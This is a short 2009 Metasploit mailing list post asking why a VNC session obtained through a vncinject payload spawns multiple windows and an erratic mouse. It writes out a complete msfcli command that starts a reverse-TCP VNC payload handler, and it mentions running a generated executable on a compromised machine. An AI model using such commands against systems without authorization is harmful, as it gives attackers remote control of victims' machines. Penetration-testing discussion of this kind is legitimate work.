Metasploit mailing list archives

multiple remote windows open on vncinject

From: Jeffs <jeffs () speakeasy net>
Date: Tue, 01 Dec 2009 17:29:48 -0500

When  running on metasploit 3.3:

msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.101 lport=5555 DisableCourtesyShell=FALSE E

and then running the msfpayload-generated .exe on the compromised machine, I am getting a vnc session on 192.168.1.101, but as soon as I move the mouse on the 192.168.1.101 vnc window, multiple instances of the windows keep popping open and the mouse behaves erratically.

I somehow remember reading something about this issue but cannot track it down.

Any help much appreciated.